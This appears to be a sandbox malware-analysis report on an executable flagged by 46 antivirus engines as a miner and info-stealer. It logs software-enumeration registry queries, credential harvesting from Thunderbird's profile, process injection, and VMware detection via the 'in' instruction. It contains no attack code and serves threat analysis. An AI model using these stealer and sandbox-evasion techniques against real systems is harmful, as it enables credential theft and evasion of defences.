RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA Sept. 30, 2024, 11:19 a.m.	key_handle: 0x0000037c regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (1 event)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1680 resumed a thread in remote process 2544
NtResumeThread Sept. 30, 2024, 11:19 a.m.	thread_handle: 0x000005ac suspend_count: 1 process_identifier: 2544	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Sept. 30, 2024, 11:19 a.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 52 89 e2 e9 59 fe ff ff exception.symbol: 66f6b6b7f2ec8_intro+0x3e9ec7 exception.instruction: in eax, dx exception.module: 66f6b6b7f2ec8_intro.exe exception.exception_code: 0xc0000096 exception.offset: 4103879 exception.address: 0x1589ec7 registers.esp: 2096700 registers.edi: 4075221 registers.eax: 1447909480 registers.ebp: 4010991636 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 22570005 registers.ecx: 20	1	0	0

File has been identified by 46 AntiVirus engines on VirusTotal as malicious (46 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Miner.4!c
Cynet	Malicious (score: 100)
Skyhigh	BehavesLike.Win32.Generic.tc
ALYac	Trojan.GenericKDZ.108064
Cylance	Unsafe
VIPRE	Trojan.GenericKDZ.108064
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (D)
BitDefender	Trojan.GenericKDZ.108064
Arcabit	Trojan.Generic.D1A620
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
Avast	Win32:TrojanX-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Miner.vho
MicroWorld-eScan	Trojan.GenericKDZ.108064
Rising	Trojan.Miner!8.EA1 (CLOUD)
Emsisoft	Trojan.GenericKDZ.108064 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
McAfeeD	Real Protect-LS!73CE03E3C27E
Trapmine	malicious.high.ml.score
CTX	exe.trojan.generic
Sophos	Mal/Stealc-A
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.73ce03e3c27ea347
Google	Detected
Avira	TR/Crypt.TPM.Gen
Kingsoft	Win32.HeurC.KVMH008.a
Gridinsoft	Trojan.Heur!.03A120A1
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	HEUR:Trojan.Win32.Miner.vho
GData	Trojan.GenericKDZ.108064
AhnLab-V3	Trojan/Win.Generic.R668215
McAfee	Artemis!73CE03E3C27E
DeepInstinct	MALICIOUS
Malwarebytes	Spyware.PasswordStealer
Panda	Trj/Chgt.AD
Zoner	Probably Heur.ExeHeaderL
Tencent	Win32.Trojan.Miner.Lcnw
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Themida.HZB!tr
AVG	Win32:TrojanX-gen [Trj]
Paloalto	generic.ml
alibabacloud	Miner:Win/Wacatac.B9nj

66f6b6b7f2ec8_intro.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All